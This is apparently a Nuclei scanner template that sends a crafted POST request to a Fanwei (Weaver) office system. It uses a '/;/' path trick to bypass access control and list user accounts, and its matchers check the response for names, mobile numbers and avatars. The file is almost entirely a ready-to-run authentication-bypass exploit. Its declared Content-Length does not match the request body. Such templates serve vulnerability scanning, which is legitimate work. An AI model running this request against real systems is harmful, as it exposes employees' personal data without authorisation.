id: fanwei-login-bypass

info:
  name: 泛微绕过权限控制获取信息
  author: Str1am
  severity: high
  tags: fanwei,bypass

requests:
  - raw:
      - |
        POST /;/emp/admin/baseuser/list HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
        Connection: close
        Content-Length: 7
        Content-Type: application/json;charset=UTF-8

        {"pageSize":164,"pagenum":1}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "totalCount"
          - "user_name"
          - "mobile"
          - "avatar"
        part: body
        condition: and